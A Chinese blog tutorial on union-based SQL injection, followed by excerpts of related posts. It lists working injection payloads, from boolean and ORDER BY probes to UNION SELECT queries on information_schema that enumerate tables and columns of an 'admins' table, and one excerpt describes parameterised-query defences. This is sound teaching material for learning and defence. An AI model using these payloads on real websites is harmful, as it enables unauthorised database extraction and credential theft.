SQL注入之联合查询注入

最新推荐文章于 2024-12-02 10:15:00 发布
原创 最新推荐文章于 2024-12-02 10:15:00 发布 · 539 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

SQL注入之联合查询注入

知识点

union联合查询

order by

information_schema

limit

select * from table limit m,n

其中m是指记录开始的index,从0开始,表示第一条记录

n是指从第m+1条开始,取n条。

select * from tablename limit 2,4

即取出第3条至第6条,4条记录

联合查询的步骤为:

1、判断是否存在注入点。

‘and 1=1 #

‘and 1=2 #

2、判断所在的数据库有几列

'order by 1 #

3、判断他显示的内容在数据库的第几列

yiz’ union select 1 #

4、查找当前用户权限

yiz’ union select user() #

5、 查找当前数据库

yiz’ union select database() #

6、 查找数据库的表名

yiz’union select (select table_name from information_schema.tables where table_schema=‘grade’ limit 0,1) #

7、查询数据库中表下的字段

yiz’union select (select group_concat(column_name) from information_schema.columns where table_schema=‘grade’ and table_name=‘admins’)#

8、 查询数据库下字段中的内容。
SQL注入联合查询
m0_56578216的博客
08-22 1235
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨查询。两条select 语句查询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨查询的方法。由于联合查询会将数据库中的两张按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的必须******
SQL注入——联合查询union
Cwillchris的博客
06-02 865
SQL注入联合查询超详细原理讲解
初学SQL注入联合查询
m0_46397814的博客
07-27 655
SQL注入原理 1、程序员在处理程序的过程和数据交互时,使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤,便将参数的内容拼接到SQL语句中。 SQL注入的危害 1、攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员的后台密码),从而脱去数据库中的内容,简称脱库。 2、在特别的情况下还可以修改数据库内容、插人内容到数据库或者删除数据库中的内容。 3、如果数据库权限分配存在问题,或者数据库本身存在缺陷,攻击者可以利用SQL注入漏洞读写文件,读取敏感文件或者上传恶意文件,可
SQL注入--联合查询注入
qq_37107430的博客
12-02 2125
联合查询注入(Union Query Injection)是一种 SQL 注入攻击方式。SQL 注入是指攻击者通过在用户输入或其他数据输入点插入恶意的 SQL 语句,来改变数据库的预期行为。联合查询注入具体是利用 SQL 中的UNION关键字来合并两个或多个SELECT语句的查询结果。
SQL注入详解
热门推荐
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入之union联合查询注入
m0_52484587的博客
07-09 1086
union联合、合并:将多条查询语句的结果合并成一个结果,union 注入攻击为一种手工测试。注入思路:A:判断是否存在注入点http://xxxxxxxxx?id=11' 异常 1 and 1=1 返回结果和 id=1 一样1 and 1=2 异常从而则一定存在 SQL 注入漏洞B:order by 1-99 语句来查询该数据的字段数C:利用获得的列数使用联合查询,union select 与前面的字段数一样找到了数据呈现的位置http://xxxxxxx?
sql注入联合查询,最详细的CMS联合查询过程!!!!
08-22
本案例聚焦于CMS(内容管理系统)中的SQL注入,特别是联合查询的利用方法。 【联合查询】是SQL注入的一种技术,允许攻击者合并两个或更多的SELECT语句,以便在不直接访问数据库的情况下获取信息。在这个场景中,...
SQL注入联合查询——ctf公开课笔记记录
m0_75196987的博客
04-18 696
SQL注入联合查询——来自 长空实验室ctf新兵训练营。Sqli-labs靶场搭建以及做题wp将由我亲自实践并为大家呈现。
sql联合查询注入
m0_65977612的博客
11-18 1091
sql联合查询注入
SQL注入-联合查询注入
m0_53820621的博客
08-10 3808
SQL注入-联合查询注入
SQL注入联合查询
weixin_65633498的博客
04-13 678
由于用户不可控输入,攻击者可以任意的输入网易的。语句,从而对数据库产生风险。三、联合查询手工注入流程。:两个查询语句列数相同。页面异常,原始查询由。
SQL注入---联合查询注入
孤的博客
10-13 1080
注入条件 页面有显示位,即在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位。 找的注入点→查询列数→找到显示位→获取列中的信息 注入点:http://192.168.1.3:8008/onews.asp?id=45 查询列数 http://192.168.1.3:8008/onews.asp?id=45 order by 猜测的列...
sql注入 联合查询
m0_70892020的博客
05-23 493
sql注入 联合查询
SQL 注入——联合查询
weixin_51559599的博客
11-06 1972
information_schema 元数据库中的 columns 中存储着数据库中所有的列。information_schema 元数据库中的 tables 中存储着数据库中所有的。语句,该语句会同时执行两条 select 语句,实现跨库、跨查询。如果报错,则说明没有该列,继续向小的数字更改查询,直到查询出列数最大值。总共有 517 个,因为此前查出在 cms 中,增加筛选条件。此处因为联合查询,每列的数据类型不同而报错,将。查看 cms_users 中的字段。连接显示出整列中的内容。
SQL注入联合查询的利用
最新发布
06-07
### SQL注入联合查询的利用方法和技巧 #### 联合查询的基本原理 联合查询(UNION Query)是SQL注入中一种常见的攻击方式,它通过将恶意构造的SQL语句附加到原始查询中,从而获取额外的数据。联合查询的核心在于使用`UNION`操作符将两个或多个SELECT语句的结果集合并为一个结果集。为了成功执行联合查询注入,攻击者需要确保以下条件[^1]: - 原始查询与构造的恶意查询返回的列数相同。 - 每一列的数据类型兼容。 #### 联合查询注入的利用方法 攻击者通常会利用联合查询来绕过输入验证并获取敏感信息。例如,假设存在一个未经过滤的登录单,其SQL查询可能如下所示: ```sql SELECT username, password FROM users WHERE username = '$username' AND password = '$password'; ``` 如果用户输入被直接拼接到SQL语句中,攻击者可以构造如下输入: ```plaintext ' UNION SELECT null, table_name FROM information_schema.tables -- ``` 这将导致最终执行的SQL语句变为: ```sql SELECT username, password FROM users WHERE username = '' UNION SELECT null, table_name FROM information_schema.tables -- ' AND password = ''; ``` 通过这种方式,攻击者可以枚举数据库中的所有[^3]。 #### 防御联合查询注入的方法 防御联合查询注入的关键在于从源头上杜绝恶意输入的影响。以下是几种有效的防御措施[^2]: 1. **参数化查询**:始终使用预编译语句和参数化查询,避免直接将用户输入嵌入SQL语句中。例如,在Python中可以使用`sqlite3`模块的参数化功能: ```python import sqlite3 conn = sqlite3.connect('database.db') cursor = conn.cursor() cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (username, password)) ``` 2. **白单过滤**:仅允许用户输入符合特定规则的数据。例如,如果应用程序只需要数字输入,则可以通过正则达式或类型检查进行过滤: ```python if not username.isdigit(): raise ValueError('Invalid username') ``` 3. **最小权限原则**:确保数据库用户的权限仅限于完成任务所需的最低权限。例如,Web应用程序的数据库账户不应具有删除或修改结构的权限[^4]。 4. **WAF(Web应用防火墙)**:部署WAF以检测和阻止常见的SQL注入模式。WAF可以作为额外的安全层,但不能完全替代其他防御措施。 #### 示例代码 以下是一个结合参数化查询和白单过滤的示例: ```python import re import sqlite3 def validate_username(username): # 白单过滤:仅允许字母、数字和下划线 if not re.match(r'^\w+$', username): raise ValueError('Invalid username') def authenticate_user(username, password): validate_username(username) # 白单过滤 conn = sqlite3.connect('database.db') cursor = conn.cursor() # 参数化查询 cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (username, password)) user = cursor.fetchone() conn.close() return user ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值